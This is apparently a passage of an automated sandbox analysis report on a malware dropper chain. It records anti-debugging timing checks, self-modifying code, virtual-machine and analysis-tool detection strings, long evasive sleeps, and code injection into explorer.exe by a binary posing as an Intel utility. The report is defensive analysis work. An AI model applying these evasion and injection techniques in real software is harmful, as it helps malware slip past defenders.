Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 33AECB second address: 33AED1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 33AED1 second address: 33AF25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 0F974DB7h 0x0000000f or dx, A403h 0x00000014 push 00000003h 0x00000016 and si, 19F1h 0x0000001b push 00000000h 0x0000001d call 00007F5E8080F365h 0x00000022 mov dx, si 0x00000025 pop edx 0x00000026 push eax 0x00000027 mov dword ptr [ebp+122D297Bh], esi 0x0000002d pop edi 0x0000002e push 00000003h 0x00000030 mov dword ptr [ebp+122D3AA2h], ebx 0x00000036 push 87B75848h 0x0000003b jo 00007F5E8080F364h 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 33AF25 second address: 33AF2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 33AF2B second address: 33AF7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 add dword ptr [esp], 3848A7B8h 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007F5E8080F358h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 movzx ecx, cx 0x00000029 lea ebx, dword ptr [ebp+1244FB97h] 0x0000002f mov dword ptr [ebp+122D2B84h], ecx 0x00000035 mov ch, F2h 0x00000037 xchg eax, ebx 0x00000038 push ecx 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F5E8080F35Bh 0x00000040 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 33B097 second address: 33B0A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 33B0A7 second address: 33B0AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 33B0AC second address: 33B0CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jp 00007F5E810FCBB4h 0x00000013 push eax 0x00000014 push edx 0x00000015 jo 00007F5E810FCBA6h 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 33B0CF second address: 33B0FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 push ecx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop ecx 0x0000000d jnc 00007F5E8080F35Ch 0x00000013 js 00007F5E8080F356h 0x00000019 popad 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 jmp 00007F5E8080F35Ah 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: B5ECB9 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: B5EDB6 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: D845FD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 1BECB9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 1BEDB6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 3E45FD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Special instruction interceptor: First address: 427CAA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Special instruction interceptor: First address: 427DAD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Special instruction interceptor: First address: 5BD7FD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Special instruction interceptor: First address: 652DF2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Special instruction interceptor: First address: 12AC404 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Special instruction interceptor: First address: 110B887 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Special instruction interceptor: First address: 12B174C instructions caused by: Self-modifying code
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe Memory allocated: 2160000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe Memory allocated: 2320000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe Memory allocated: 2160000 memory reserve | memory write watch
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_054E07AB rdtsc 0_2_054E07AB
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1162 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1095 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1159 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1133 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5430
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3162
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3957
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3280
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1293
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\main\7z.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe API coverage: 5.2 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3220 Thread sleep time: -48024s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3912 Thread sleep count: 1162 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3912 Thread sleep time: -2325162s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7320 Thread sleep count: 272 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7320 Thread sleep time: -8160000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6100 Thread sleep count: 1095 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6100 Thread sleep time: -2191095s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2912 Thread sleep count: 1159 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2912 Thread sleep time: -2319159s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3020 Thread sleep count: 1133 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3020 Thread sleep time: -2267133s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5828 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7952 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe TID: 6072 Thread sleep time: -240000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3524 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2472 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe TID: 5752 Thread sleep count: 247 > 30
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe TID: 5752 Thread sleep time: -7410000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe TID: 1820 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe TID: 5752 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe TID: 7140 Thread sleep time: -922337203685477s >= -30000s
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Last function: Thread delayed
Source: C:\Program Files\Windows Media Player\graph\graph.exe Last function: Thread delayed
Source: C:\Program Files\Windows Media Player\graph\graph.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Code function: 6_2_0040367D GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime, 6_2_0040367D
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Code function: 6_2_004031DC FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z, 6_2_004031DC
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 10_2_00C87978 FindFirstFileW,FindFirstFileW,free, 10_2_00C87978
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 10_2_00C8881C free,free,GetLogicalDriveStringsW,GetLogicalDriveStringsW,free,free,free, 10_2_00C8881C
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 10_2_00C8B5E0 GetSystemInfo, 10_2_00C8B5E0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\ Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Local\ Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\main\ Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\ Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\main\extracted Jump to behavior
Source: skotes.exe, skotes.exe, 00000005.00000002.2936910780.0000000000342000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000005.00000000.2263763833.0000000000342000.00000080.00000001.01000000.00000007.sdmp, b2885fa695.exe, 00000020.00000002.2760571894.000000000059E000.00000040.00000001.01000000.0000000E.sdmp, b7c03317c9.exe, 0000002A.00000002.2939183948.0000000001288000.00000040.00000001.01000000.00000014.sdmp, file.exe Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: PING.EXE, 00000032.00000002.2933675401.00000248C0388000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZZ,sP
Source: b7c03317c9.exe, 0000002A.00000002.2930917753.0000000000F9D000.00000040.00000001.01000000.00000014.sdmp Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: 72f44ceb0a.exe, 00000024.00000003.2591584550.0000000001611000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: file.exe Binary or memory string: .vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 4115805b10.exe, 00000027.00000002.2796654960.000002681092B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWp
Source: 4cdf81e042.exe, 0000002C.00000002.2937965345.000000000149D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWt
Source: skotes.exe, 00000005.00000002.2942570852.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000005.00000002.2942570852.0000000000D79000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2529597968.0000000001319000.00000004.00000020.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2559195373.0000000000D2C000.00000004.00000020.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2759950146.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000002.2764183695.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000002.2764183695.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, Gxtuum.exe, 00000026.00000002.2935835447.00000000015B3000.00000004.00000020.00020000.00000000.sdmp, Gxtuum.exe, 00000026.00000002.2935835447.00000000015E7000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000027.00000002.2796654960.00000268109C0000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000027.00000003.2753594593.00000268109C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000001F.00000002.2529597968.0000000001319000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWf
Source: 72f44ceb0a.exe, 00000024.00000003.2594544795.00000000015A9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: b7c03317c9.exe, 0000002A.00000002.2930917753.0000000000F9D000.00000040.00000001.01000000.00000014.sdmp Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: file.exe, 00000000.00000002.1724592042.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1754388426.0000000000342000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000005.00000002.2936910780.0000000000342000.00000040.00000001.01000000.00000007.sdmp, b2885fa695.exe, 00000020.00000002.2760571894.000000000059E000.00000040.00000001.01000000.0000000E.sdmp, b7c03317c9.exe, 0000002A.00000002.2939183948.0000000001288000.00000040.00000001.01000000.00000014.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: explorer.exe, 0000002F.00000002.2881532847.00000000006F9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWA
Source: PING.EXE, 0000001D.00000002.2544952125.000001FB3D2AD000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000023.00000002.2564088029.000001B778368000.00000004.00000020.00020000.00000000.sdmp, b7c03317c9.exe, 0000002A.00000002.2943794217.0000000001EC7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 4cdf81e042.exe, 0000002C.00000002.2937965345.0000000001476000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWH,K
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Thread information set: HideFromDebugger
Potentially malicious time measurement code found
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_04CB003E Start: 04CB046B End: 04CB006B 5_2_04CB003E
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\explorer.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Process queried: DebugPort
Source: C:\Windows\explorer.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_054E07AB rdtsc 0_2_054E07AB
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Code function: 6_2_00402665 LoadLibraryA,GetProcAddress,GetNativeSystemInfo, 6_2_00402665
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B2652B mov eax, dword ptr fs:[00000030h] 0_2_00B2652B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B2A302 mov eax, dword ptr fs:[00000030h] 0_2_00B2A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_0018A302 mov eax, dword ptr fs:[00000030h] 1_2_0018A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_0018652B mov eax, dword ptr fs:[00000030h] 1_2_0018652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_0018A302 mov eax, dword ptr fs:[00000030h] 5_2_0018A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_0018652B mov eax, dword ptr fs:[00000030h] 5_2_0018652B
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion
barindex
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 8060 base: 140000000 value: 4D
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 8060 base: 140001000 value: 40
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 8060 base: 1402DD000 value: 58
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 8060 base: 14040B000 value: A4
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 8060 base: 140739000 value: 00
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 8060 base: 14075E000 value: 48
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 8060 base: 14075F000 value: 48
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 8060 base: 140762000 value: 48
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 8060 base: 140764000 value: 00
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 8060 base: 140765000 value: 00
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 8060 base: 105A010 value: 00
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 6284 base: 140000000 value: 4D
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 6284 base: 140001000 value: 40
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 6284 base: 1402DD000 value: 58
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 6284 base: 14040B000 value: A4
